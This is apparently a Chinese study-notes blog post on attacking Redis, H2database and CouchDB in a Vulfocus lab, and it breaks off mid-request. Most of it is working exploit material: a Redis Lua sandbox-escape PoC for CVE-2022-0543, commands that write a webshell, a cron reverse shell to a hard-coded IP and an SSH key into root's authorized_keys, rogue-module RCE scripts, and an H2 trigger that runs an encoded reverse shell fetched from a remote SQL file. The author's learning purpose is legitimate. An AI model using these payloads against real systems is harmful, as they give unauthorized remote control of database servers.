服务攻防第七十八天（2023）

最新推荐文章于 2024-04-30 11:54:52 发布

xiaopeisec

最新推荐文章于 2024-04-30 11:54:52 发布

阅读量132

点赞数

文章标签：服务攻防 web安全笔记安全

本文链接：https://blog.csdn.net/B_l_a_nk/article/details/133853915

版权

服务攻防-数据库安全&Redis&CouchDB&H2database&未授权访问&CVE漏洞

#数据库应用-Redis-未授权访问&CVE漏洞

漏洞复现

沙箱绕过RCE-CVE-2022-0543

未授权访问-CNVD-2019-21763

未授权访问：CNVD-2015-07557

数据库应用-H2database--未授权访问&CVE漏洞

未授权进入：

RCE执行反弹：

数据库应用-Couchdb-未授权越权&CVE漏洞

Couchdb 垂直权限绕过（CVE-2017-12635）

Couchdb 命令执行（CVE-2017-12636）

数据库应用-H2database--未授权访问&CVE漏洞

1、未授权进入：

2、RCE执行反弹：

#知识点

1、数据库-Redis-未授权RCE&CVE

2、数据库-Couchdb-未授权RCE&CVE

3、数据库-H2database-未授权RCE&CVE

#章节点

1、目标判断-端口扫描&组合判断&信息来源

2、安全问题-配置不当&CVE漏洞&弱口令爆破

3、复现对象-数据库&中间件&开发框架&应用协议

#前置知识：

1、复现环境：Vulfocus(官方在线的无法使用)

官方手册：https://fofapro.github.io/vulfocus/#/

搭建踩坑：（无法同步）

https://blog.csdn.net/m0_64563956/article/details/131229046

服务判断

端口扫描：利用服务开启后目标端口开放判断（比如redis的6379端口）

组合判断：利用搭建常见组合分析可能开放服务（比如使用java当作脚本语言，那可能就会使用SpringBoot开发框架）

信息来源：访问端口提示软件版本，应用信息等（这个就是当你访问的时候直接显示出来的版本或者特征信息）

强弱特征：如框架shiro强特征rememberMe,SpringBoot默认页面等

对象类别

对服务进行类别划分，通过服务功能理解，如数据库有帐号密码就有爆破利用方法，也可以针对服务公开的CVE进行漏洞测试及服务常见的错误安全配置导致的未授权访问等。

利用方法

主要集中在CVE漏洞，未授权访问，弱口令爆破等

在进行复现之前，需要先将vulfocus靶场搭建起来。

vulfocus环境搭建

服务器环境：阿里云Ubuntu22.04

首先更新一下apt源

apt-get update

安装docker

apt install docker

安装docker-compose(安装编译环境)

apt install docker-compose

查看一下docker和docker-compose的版本，确保安装完成

创建deamon.json文件，并下加速链接粘贴到该文件中，否则拉镜像时会很慢

{

"registry-mirrors": [

"https://dockerproxy.com/"

]

}

拉取镜像

docker pull dockerproxy.com/vulfocus/vulfocus:latest

重命名镜像

docker tag dockerproxy.com/vulfocus/vulfocus:latest vulfocus/vulfocus:latest

删除代理镜像

docker rmi dockerproxy.com/vulfocus/vulfocus:latest

启动环境，并将端口映射到本地的80端口（也就是将docker中的80端口映射到服务器的80端口）

docker run -p 80:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=0.0.0.0 vulfocus/vulfocus

直接访问服务器IP即可

默认管理员账号：admin

默认密码：admin

这里需要注意一点，一定要按照上面的步骤搭建，不然可能会出现“一键同步”失败的情况

这里是可以成功同步的

这里我们搜索redis，便可以搜到有关redis的三个漏洞，直接下载即可

下载完成之后点击首页便可以看到刚下载的三个漏洞

由于环境搭建在公网，所以这里建议修改密码

到此处我们的vulfocus就搭建完成，接着就开始三个数据库相关漏洞的复现了。

#数据库应用-Redis-未授权访问&CVE漏洞

默认端口：6379

Redis是一套开源的使用ANSI C编写、支持网络、可基于内存亦可持久化的日志型、键值存储数据库，并提供多种语言的API。Redis如果在没有开启认证的情况下，可以导致任意用户在可以访问目标服务器的情况下未授权访问Redis以及读取Redis的数据。

漏洞复现

沙箱绕过RCE-CVE-2022-0543

poc：执行id命令

eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("id", "r"); local res = f:read("*a"); f:close(); return res'0

在靶场将环境启动后，默认的redis数据库端口号是6379，但是这里由于是在docker中启动并映射到阿里云主机的40540端口。所以我们在复现的时候直接连接40540端口即可。在实战中还是直接连接6379。而redis的特征点就是端口，当通过端口扫描工具(nmap等)扫描到目标服务器开启6379端口便可以对其进行测试。

直接利用工具ARDB进行连接，点击新建连接输入ip和端口直接连接即可。

注：Another Redis DeskTop Manager (简称：ARDB) 是一款 Redis 管理工具，它是一款跨平台的桌面应用程序，支持 Windows、MacOS 和 Linux 等操作系统。

这里我们直接输入POC，在箭头所指的部位填上要执行的命令即可。

未授权访问-CNVD-2019-21763

由于在Reids4.x及以上版本中新增了模块功能，攻击者可通过外部拓展，在Redis中实现一个新的Redis命令。攻击者可以利用该功能引入模块，在未授权访问的情况下使被攻击服务器加载恶意.so 文件，从而实现远程代码执行。

https://github.com/vulhub/redis-rogue-getshell

python redis-master.py -r 目标IP -p 目标端口 -L 攻击IP -P 8888 -f RedisModulesSDK/exp.so -c "id"

这个漏洞成因就是redis新增模块功能导致可以加载恶意so文件进而实现远程代码执行

去上面的链接下载的文件是没有exp.so文件的，需要进行make一下

编译完成之后便可以得到exp.so文件

然后便可以执行命令了，这里要注意攻击机的8888端口要开放，因为当攻击机发送请求后，结果是需要回连给攻击机的。

未授权访问：CNVD-2015-07557

写Webshell需得到Web路径

利用条件：Web目录权限可读写

config set dir /tmp #设置WEB写入目录

config set dbfilename 1.php #设置写入文件名

set test "<?php phpinfo();?>" #设置写入文件代码

bgsave #保存执行

save #保存执行

注意：部分没目录权限读写权限

写定时任务反弹shell

利用条件：Redis服务使用ROOT账号启动，安全模式protected-mode处于关闭状态

config set dir /var/spool/cron

set yy "\n\n\n* * * * * bash -i >& /dev/tcp/47.94.236.117/5555 0>&1\n\n\n"

config set dbfilename x

save

注意：

centos会忽略乱码去执行格式正确的任务计划

而ubuntu并不会忽略这些乱码，所以导致命令执行失败

写入Linux ssh-key公钥

利用条件：Redis服务使用ROOT账号启动，安全模式protected-mode处于关闭状态

允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器

ssh-keygen -t rsa

cd /root/.ssh/

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n")> key.txt

cat key.txt | redis-cli -h 目标IP -x set xxx

//以上步骤在自己的攻击机器上执行

config set dir /root/.ssh/

config set dbfilename authorized_keys

save

cd /root/.ssh/

ssh -i id_rsa root@目标IP

在面试的时候，经常会有面试官问道redis未授权的三种gettshell方式，那么就是上面的三种了，分别是写公钥利用ssh连接、设置定时任务、直接写入后门。但这三种getshell的方式存在很多条件，所以实际遇到redis未授权的时候，可以直接利用github上的自动化脚本进行探测。否则还需要一个方法一个方法的去试比较麻烦

自动化项目

https://github.com/n0b0dyCN/redis-rogue-server

python redis-rogue-server.py --rhost 目标IP --rport 目标端口 --lhost IP

这个自动化项目也是需要make一下，这里注意一下目录是在exp目录下make，不要搞错了。

完成之后便会得到so文件

然后直接执行即可，这里有三个需要注意的点，第一个是这里也是需要攻击机的端口21000开放，可能每个人的端口不一样，这个应该是随机的，不要忘记端口开放就行；第二个是利用这个脚本去测试的时候，第一次会报错，第二次就好了，不知道为什么；第三个就是可以选择i模式和r模式，i模式就是交互式，r模式就是反弹shell。这里直接选择交互式就可以执行命令了。

数据库应用-H2database--未授权访问&CVE漏洞

默认端口：20051

Java SQL 数据库 H2,H2的主要特点是：非常快，开源，JDBC API；嵌入式和服务器模式；内存数据库；基于浏览器的控制台应用程序。H2 数据库控制台中的另一个未经身份验证的 RCE 漏洞，在v2.1.210+中修复。2.1.210 之前的H2控制台允许远程攻击者通过包含子字符串的jdbc:h2:mem JDBC URL执行任意代码。

未授权进入：

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;\

RCE执行反弹：

-创建数据库文件：h2database.sql

CREATE TABLE test (

id INT NOT NULL

);

CREATE TRIGGER TRIG_JS BEFORE INSERT ON TEST AS '//javascript

Java.type("java.lang.Runtime").getRuntime().exec("bash -c {echo,base64加密的反弹shell指令}|{base64,-d}|{bash,-i}");';

#反弹指令示例：bash -i >& /dev/tcp/x.x.x.x/6666 0>&1

-启动提供SQL文件远程加载服务

python3 -m http.server 端口

-填入Payload使其加载远程SQL

jdbc:h2:mem:test1;FORBID_CREATION=FALSE;IGNORE_UNKNOWN_SETTINGS=TRUE;FORBID_CREATION=FALSE;INIT=RUNSCRIPT FROM 'http://搭建的IP:端口/h2database.sql';\

nc -lvvp xxxx

数据库应用-Couchdb-未授权越权&CVE漏洞

默认端口：5984

Couochdb是一个主要储存JSON数据的数据库，显著特点就是端口5984.

Couchdb 垂直权限绕过（CVE-2017-12635）

ApacheCouchDB是一个开源数据库，专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式，JavaScript作为查询语言，MapReduce和HTTP作为API的NoSQL数据库。应用广泛，如BBC用在其动态内容展示平台，CreditSuisse用在其内部的商品部门的市场框架，Meebo，用在其社交平台（web和应用程序）。在2017年11月15日，CVE-2017-12635和CVE-2017-12636披露利用。

1、先创建用户

PUT /_users/org.couchdb.user:xiaodi HTTP/1.1

Host:47.94.236.117:44389

Accept:*/*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/json

Content-Length: 108

{

"type": "user",

"name": "xiaodi",